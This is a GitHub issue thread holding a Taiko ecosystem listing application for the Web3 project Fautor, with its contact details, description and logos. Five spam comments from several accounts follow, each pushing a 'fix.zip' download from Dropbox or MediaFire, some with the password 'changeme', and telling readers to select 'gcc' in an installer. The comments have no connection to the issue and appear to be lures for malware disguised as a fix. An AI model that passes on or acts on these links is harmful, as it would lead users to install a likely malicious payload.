### ISSUE TITLE
Fautor Foundation

### ISSUE THREAD

**Issue by fautor-dev** [taikoxyz/website-v2#241]
### What is the name of your project?

Fautor

### What's your name?

Junmin Lee

### Email

odd@fautor.foundation

### Telegram

@oddrap

### Please provide a link to your website, documentation, or project overview

https://fautor.foundation

### What is your project's X handle?

@fautor_official

### Project Category

Community

### Is your project currently live on Taiko mainnet?

No

### Github Link of your project

https://github.com/fautor-dev/fautor

### Please provide a clear and comprehensive description of your project and what value it will bring to Taiko's ecosystem

Fautor is a blockchain project of Fantrie. Fantrie is a creators-fans community platform focusing on Asia market. The platform has over 1600 creators and over 1.1 million users. Fautor integrated web3.0 features in Fantrie so every creators and fans are now web3.0 users. 

### List of other networks you are deployed on

Avalanche, Klaytn

### Please share your logo

![Frame 35](https://github.com/user-attachments/assets/08f948d4-65d1-4b2a-9d12-d8536d055aed)
![main_black_200x200](https://github.com/user-attachments/assets/14601c36-f981-4b7e-9581-b20863ce0f34)
![main_black](https://github.com/user-attachments/assets/7dcffa20-dae8-47f3-ad23-88661ca135c5)
![main_green_200x200](https://github.com/user-attachments/assets/557aede8-fa18-4542-8529-1e930df74908)
![main_green](https://github.com/user-attachments/assets/fcdaa27d-fbc4-4581-8dc7-e4672ae04c41)
![main_white_200x200](https://github.com/user-attachments/assets/6d1fb706-e95e-4740-acd5-58138c3e1272)
![main_white](https://github.com/user-attachments/assets/f21a5d8c-d1a4-4c1c-8ef8-6fbc272aefe1)
![symbol_black_200x200](https://github.com/user-attachments/assets/0d3a1a8d-acf7-4756-b756-d560e6632259)
![symbol_black](https://github.com/user-attachments/assets/e7ed003d-86d8-4633-8abd-70b454111d42)
![symbol_green](https://github.com/user-attachments/assets/ee082209-9109-407f-b27b-7926a7a4d637)
![symbol_white_200x200](https://github.com/user-attachments/assets/8414fac4-a660-4651-a5b6-789248a78585)
![symbol_white](https://github.com/user-attachments/assets/3a4fe262-274b-4fe2-9780-4095990ee031)

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
